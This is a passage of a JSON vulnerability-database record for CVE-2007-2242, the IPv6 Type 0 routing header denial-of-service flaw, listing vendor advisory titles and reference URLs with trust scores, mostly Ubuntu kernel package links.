        "trust": 0.8,
        "url": "http://openbsd.org/errata40.html#012_route6"
      },
      {
        "title": "RHSA-2007:0347",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2007-0347.html"
      },
      {
        "title": "\u30bf\u30a4\u30d70\u306e\u30eb\u30fc\u30c6\u30a3\u30f3\u30b0\u30d8\u30c3\u30c0\u304c\u4ed8\u3044\u305fIPv6\u304cDoS\u653b\u6483\u306b\u4f7f\u308f\u308c\u308b\u53ef\u80fd\u6027\u306e\u3042\u308b\u8106\u5f31\u6027\u306b\u3064\u3044\u3066",
        "trust": 0.8,
        "url": "http://www.rtpro.yamaha.co.jp/rt/faq/security/vu267289.html"
      },
      {
        "title": "[\u5f71\u97ff\uff1a\u3042\u308a] IPv6\u30d7\u30ed\u30c8\u30b3\u30eb\u4ed5\u69d8\u306e\u8106\u5f31\u6027",
        "trust": 0.8,
        "url": "http://www.seil.jp/seilseries/news/snote/snote_200705_01.html"
      },
      {
        "title": "cisco-sa-20070124-IOS-IPv6",
        "trust": 0.8,
        "url": "http://www.cisco.com/cisco/web/support/jp/102/1021/1021604_cisco-sa-20070124-ios-ipv6-j.html"
      },
      {
        "title": "IPv6\u62e1\u5f35\u30d8\u30c3\u30c0\u306eType0 \u30eb\u30fc\u30c6\u30a3\u30f3\u30b0\u30d8\u30c3\u30c0\u306b\u95a2\u3059\u308b\u8106\u5f31\u6027\u306b\u3064\u3044\u3066",
        "trust": 0.8,
        "url": "http://www.allied-telesis.co.jp/support/list/faq/vuls/20071025.html"
      },
      {
        "title": "RHSA-2007:0347",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2007-0347j.html"
      },
      {
        "title": "\u30eb\u30fc\u30bf\uff08Si-R\u30b7\u30ea\u30fc\u30ba,Si-R70brin\uff09\u306eIPv6\u30d7\u30ed\u30c8\u30b3\u30eb\u5b9f\u88c5\u306b\u8d77\u56e0\u3059\u308b\u8106\u5f31\u6027\u3078\u306e\u5bfe\u5fdc\u306b\u3064\u3044\u3066",
        "trust": 0.8,
        "url": "http://fenics.fujitsu.com/products/support/2007/sir_07.html"
      },
      {
        "title": "VU#267289",
        "trust": 0.8,
        "url": "http://software.fujitsu.com/jp/security/vulnerabilities/vu267289.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000387"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-2242"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.7,
        "url": "http://www.kb.cert.org/vuls/id/267289"
      },
      {
        "trust": 2.4,
        "url": "http://openbsd.org/errata40.html#012_route6"
      },
      {
        "trust": 2.4,
        "url": "http://docs.info.apple.com/article.html?artnum=305712"
      },
      {
        "trust": 2.4,
        "url": "http://secunia.com/advisories/25068"
      },
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/23615"
      },
      {
        "trust": 2.0,
        "url": "http://www.secdev.org/conf/ipv6_rh_security-csw07.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://security.freebsd.org/advisories/freebsd-sa-07:03.ipv6.asc"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/24978"
      },
      {
        "trust": 1.6,
        "url": "http://openbsd.org/errata39.html#022_route6"
      },
      {
        "trust": 1.6,
        "url": "https://issues.rpath.com/browse/rpl-1310"
      },
      {
        "trust": 1.6,
        "url": "http://www.ubuntu.com/usn/usn-508-1"
      },
      {
        "trust": 1.6,
        "url": "http://www.ubuntu.com/usn/usn-486-1"
      },
      {
        "trust": 1.6,
        "url": "http://www.securitytracker.com/id?1017949"
      },
      {
        "trust": 1.6,
        "url": "http://www.securityfocus.com/archive/1/471457"
      },
      {
        "trust": 1.6,
        "url": "http://www.redhat.com/support/errata/rhsa-2007-0347.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.novell.com/linux/security/advisories/2007_51_kernel.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.mandriva.com/security/advisories?name=mdksa-2007:216"
      },
      {
        "trust": 1.6,
        "url": "http://www.mandriva.com/security/advisories?name=mdksa-2007:196"
      },
      {
        "trust": 1.6,
        "url": "http://www.mandriva.com/security/advisories?name=mdksa-2007:171"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/28806"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/26703"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/26664"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/26651"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/26620"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/26133"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25770"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25691"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25288"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25083"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25033"
      },
      {
        "trust": 1.6,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2008-02/msg00002.html"
      },
      {
        "trust": 1.6,
        "url": "http://docs.info.apple.com/article.html?artnum=306375"
      },
      {
        "trust": 1.4,
        "url": "http://www.frsirt.com/english/advisories/2007/1563"
      },
      {
        "trust": 1.4,
        "url": "http://xforce.iss.net/xforce/xfdb/33851"
      },
      {
        "trust": 1.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2242"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/467939/30/6690/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://www.vupen.com/english/advisories/2007/1563"
      },
      {
        "trust": 1.0,
        "url": "http://www.vupen.com/english/advisories/2007/2270"
      },
      {
        "trust": 1.0,
        "url": "http://www.vupen.com/english/advisories/2007/3050"
      },
      {
        "trust": 1.0,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33851"
      },
      {
        "trust": 1.0,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9574"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/24978/"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/25033/"
      },
      {
        "trust": 0.8,
        "url": "http://www.secdev.org/conf/ipv6_rh_security-csw07.pdf "
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/25068/"
      },
      {
        "trust": 0.8,
        "url": "http://www.ietf.org/rfc/rfc2460.txt"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/25770/"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/26703/"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnvu%23267289/index.html"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2242"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2242"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/archive/1/467939/30/6690/threaded"
      },
      {
        "trust": 0.6,
        "url": "http://www.frsirt.com/english/advisories/2007/3050"
      },
      {
        "trust": 0.6,
        "url": "http://www.frsirt.com/english/advisories/2007/2270"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2453"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2525"
      },
      {
        "trust": 0.3,
        "url": "http://blogs.sun.com/security/entry/ipv6_routing_header_issues"
      },
      {
        "trust": 0.3,
        "url": "http://www.cisco.com/warp/public/707/cisco-sa-20070124-ios-ipv6.shtml"
      },
      {
        "trust": 0.3,
        "url": "http://www1.ietf.org/mail-archive/web/ipv6/current/msg07499.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.freebsd.org/"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.20.9"
      },
      {
        "trust": 0.3,
        "url": "http://www.netbsd.org/"
      },
      {
        "trust": 0.3,
        "url": "http://www.openbsd.org"
      },
      {
        "trust": 0.3,
        "url": "http://www.apple.com/support/downloads/airportextremebasestationwith80211nfirmware721.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.ipv6.org/"
      },
      {
        "trust": 0.3,
        "url": "http://www.seil.jp/en/news/snote/snote_200705_01_en.html"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2007-0347.html"
      },
      {
        "trust": 0.3,
        "url": "http://support.novell.com/techcenter/psdb/a4e6d19f94707022b621550d1049f74e.html"
      },
      {
        "trust": 0.3,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2525"
      },
      {
        "trust": 0.3,
        "url": "http://www.mandriva.com/security/"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3105"
      },
      {
        "trust": 0.3,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2172"
      },
      {
        "trust": 0.3,
        "url": "http://www.mandriva.com/en/security/kernelupdate"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2172"
      },
      {
        "trust": 0.3,
        "url": "http://www.mandriva.com/security/advisories"
      },
      {
        "trust": 0.3,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2453"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2876"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2006-7203"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2875"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3105"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-1861"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4308"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3848"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-1497"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1497"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-7203"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2876"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2875"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4133"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4133"
      },
      {
        "trust": 0.1,
        "url": "http://security.freebsd.org/patches/sa-07:03/ipv6.patch.asc"
      },
      {
        "trust": 0.1,
        "url": "http://www.freebsd.org/handbook/kernelconfig.html\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://security.freebsd.org/patches/sa-07:03/ipv6.patch"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.39_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.39_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-386_2.6.17.1-12.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc-smp_2.6.17.1-12.39_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc64-smp_2.6.17.1-12.39_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64-smp_2.6.17.1-12.39_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.39_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc-smp_2.6.17.1-12.39_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc-smp_2.6.17.1-12.39_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.39_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc64-smp_2.6.17.1-12.39_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.39.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.39_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
